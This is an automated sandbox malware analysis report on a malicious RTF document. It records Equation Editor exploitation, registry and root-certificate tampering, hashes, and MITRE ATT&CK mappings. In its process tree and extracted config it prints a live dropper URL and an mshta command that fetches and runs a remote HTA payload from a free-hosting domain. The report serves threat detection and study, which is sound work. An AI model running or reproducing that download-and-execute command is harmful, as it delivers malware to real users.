b0ed2c857e16dc73cb43948b6a476b4352ec93822b6429081e55e34ffd797d4e

Analysis

max time kernel
133s
max time network
133s
platform
windows7_x64
resource
win7-20240419-en
resource tags

arch:x64arch:x86image:win7-20240419-enlocale:en-usos:windows7-x64system
submitted
23-05-2024 01:01

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

69391376e609f6686d1fac56553c1848_JaffaCakes118.rtf
Size

8KB
MD5

69391376e609f6686d1fac56553c1848
SHA1

55f1caad9b30ae6ee22eb99756cffbbe87e64e9e
SHA256

b0ed2c857e16dc73cb43948b6a476b4352ec93822b6429081e55e34ffd797d4e
SHA512

3fe8d1137c2f052a89a79c990571492ebbfb2f550ed4a6a00995043e312db6796eb419cb98155852971c84c77a40539aea1feeec35b5675e4e219730265a801e
SSDEEP

48:Mp54iWuckUmjNHDxEXBLsKSm3OZhZLuah23ww9WGvigm3qN:MwuFpzEKa8M5WGviFaN

Score

10^/10

Malware Config

Extracted

Language

hta

Source

URLs

hta.dropper

http://woffice365.000webhostapp.com/Windows%20Start-Up%20Application.hta

Signatures

Blocklisted process makes network request 26 IoCs

Processes:

mshta.exe

flow	pid	process
4	1940	mshta.exe
8	1940	mshta.exe
9	1940	mshta.exe
11	1940	mshta.exe
12	1940	mshta.exe
14	1940	mshta.exe
18	1940	mshta.exe
19	1940	mshta.exe
20	1940	mshta.exe
21	1940	mshta.exe
23	1940	mshta.exe
25	1940	mshta.exe
26	1940	mshta.exe
27	1940	mshta.exe
28	1940	mshta.exe
29	1940	mshta.exe
30	1940	mshta.exe
31	1940	mshta.exe
32	1940	mshta.exe
33	1940	mshta.exe
37	1940	mshta.exe
38	1940	mshta.exe
39	1940	mshta.exe
40	1940	mshta.exe
41	1940	mshta.exe
42	1940	mshta.exe

Drops file in Windows directory 1 IoCs

Processes:

WINWORD.EXE

description ioc process

File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE
Office loads VBA resources, possible macro or embedded object present
Launches Equation Editor 1 TTPs 2 IoCs
Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.
exploit

Exploitation for Client Execution
T1203

Processes:

EQNEDT32.EXEEQNEDT32.EXE

pid process

2408 EQNEDT32.EXE
2708 EQNEDT32.EXE

description	ioc	process
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	WINWORD.EXE

pid	process
2408	EQNEDT32.EXE
2708	EQNEDT32.EXE

Modifies Internet Explorer settings 1 TTPs 32 IoCs

adware spyware

Modify Registry

T1112

Processes:

WINWORD.EXEmshta.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\ = "&Edit"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105"	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor	WINWORD.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55"	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Internet Explorer\Toolbar	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\COMMAND	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel	WINWORD.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Internet Explorer\MenuExt	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\COMMAND	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\ = "&Edit"	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell	WINWORD.EXE

Modifies registry class 64 IoCs

Processes:

WINWORD.EXE

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\ShellEx	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ = "&Open"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\ = "&Open"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\topic\ = "system"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon\mhtmlfile	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon\htmlfile	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shellex\IconHandler	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\ = "&Print"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\topic	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shellex\IconHandler\ = "{42042206-2D85-11D3-8CFF-005004838597}"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\command	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ = "&Open"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\ = "[open(\"%1\")]"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\ = "&Open"	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic\ = "system"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\DefaultIcon	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\topic	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" /p %1"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\ = "&Open"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32\ = "C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohevi.dll"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\command	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" /p %1"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ = "&Open"	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon	WINWORD.EXE

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

Processes:

mshta.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8	mshta.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	mshta.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

WINWORD.EXE

pid process

1992 WINWORD.EXE
Suspicious use of SetWindowsHookEx 2 IoCs

Processes:

WINWORD.EXE

pid process

1992 WINWORD.EXE
1992 WINWORD.EXE

pid	process
1992	WINWORD.EXE

pid	process
1992	WINWORD.EXE
1992	WINWORD.EXE

Suspicious use of WriteProcessMemory 8 IoCs

Processes:

EQNEDT32.EXEWINWORD.EXE

description	pid	process	target process
PID 2408 wrote to memory of 1940	2408	EQNEDT32.EXE	mshta.exe
PID 2408 wrote to memory of 1940	2408	EQNEDT32.EXE	mshta.exe
PID 2408 wrote to memory of 1940	2408	EQNEDT32.EXE	mshta.exe
PID 2408 wrote to memory of 1940	2408	EQNEDT32.EXE	mshta.exe
PID 1992 wrote to memory of 3052	1992	WINWORD.EXE	splwow64.exe
PID 1992 wrote to memory of 3052	1992	WINWORD.EXE	splwow64.exe
PID 1992 wrote to memory of 3052	1992	WINWORD.EXE	splwow64.exe
PID 1992 wrote to memory of 3052	1992	WINWORD.EXE	splwow64.exe

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\69391376e609f6686d1fac56553c1848_JaffaCakes118.rtf"
1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1992

C:\Windows\splwow64.exe
C:\Windows\splwow64.exe 12288
2⤵
PID:3052

C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
1⤵
- Launches Equation Editor
- Suspicious use of WriteProcessMemory
PID:2408

C:\Windows\SysWOW64\mshta.exe
mshta http://woffice365.000webhostapp.com/Windows%20Start-Up%20Application.hta
2⤵
- Blocklisted process makes network request
- Modifies Internet Explorer settings
- Modifies system certificate store
PID:1940

C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
1⤵
- Launches Equation Editor
PID:2708

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Exploitation for Client Execution

T1203

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357
Filesize
1KB

MD5
a266bb7dcc38a562631361bbf61dd11b

SHA1
3b1efd3a66ea28b16697394703a72ca340a05bd5

SHA256
df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e

SHA512
0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize
344B

MD5
393063b5b7643e8ea72ee75bfacbca26

SHA1
9b93cb3659297ea29f24d3e09ef8ea941765b4ea

SHA256
9d57a2de3807e0e44964ba61119b15f4d756f21df8ebf470358a095ec6bfb5fd

SHA512
a8b8fae07047d3b850e06e381af38873fffd22180e5dcb9a041dfbb6b8ed21d39a347d08b46347d7365c383ac5a8f394da22e6b907f7760f6f4431291fc9bd4b

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize
344B

MD5
b4c60d32c05fdbafc0efaa4b006d1ee9

SHA1
d6285164918091ea3826a485fb1d146cbb28803a

SHA256
35e7cb21cf0c825279ea89e2da6570b09bac4e093c7f0bb89c831997c740908d

SHA512
69217e0c534a5594cdc9686281f5e7f1c5a9c27898a1768dcc5195e2196e6b6d8f6972b354b5e3521d2829546a6225e5cd2432efd37cf70c8eaf260d59f668b7

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize
344B

MD5
70a34d9239b7be97d7c28a6db10dbb0f

SHA1
93bd2c8bda82120785300d2b00d6418207daa972

SHA256
0d8b5fc49b153b745dca2086233d61794dc444caca4e3cbd6ac1d98c5ddcb661

SHA512
3925166a63ea6828999ac879299bfd249961ddbd98e387f6122a3644998713a4e3e33df3ff120f84ac1ebbf1005cd7453eefa472ce2ec6d0c7695c575dfc43cb

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize
344B

MD5
a732d61ae857ddaf71754ed12cc87599

SHA1
668db997843fa04843d87bf889c6266a9e037c78

SHA256
bbd5d48775157bfd31019cca2d0c144d105f7e81c6613642fd8bbb5d476c735b

SHA512
a5948ae8af05591f11e6bebcbb918426c0a46850a547dc47909f9393fe4578dc4724d51307f13217f3d4461bf5abfefe9f76b0917a17838ca1796b494ec14db3

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize
344B

MD5
17a1e2d95c2615b13fa81ec60a974b34

SHA1
669b99f545a6b33f73770fe9129b9eeb847dfac1

SHA256
c55c4d778021d74e2caad25cc17e2dcf4f3ea7e58aca8bd58c55327d60c2972f

SHA512
2ddcd6aa33c3a58b1b9ba9f37cdcbb606b27976f99cc9dbd03ddfc3f9206f39d49fa858c958dbfea2043170785ae847a387afd4e51a3ecbec6316a4a52a8d442

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize
344B

MD5
92a80f9591b2cf8c9d8e5a8170ace9e5

SHA1
9319b92e0efcda46423f3f0cb35f8fbc1588414a

SHA256
418d96e5ac11a748c740d1af9ea6ccad361f50c14caa1eabb5233f7364e9b7ab

SHA512
98b607c63f3946863d142185d4e64d7a3c79cc4cfcbad40370230a7c71941155efd7a9a0d393fbf1bee9b87c6e6f07e91a501fc1eaa6c525001f867ac9ebba06

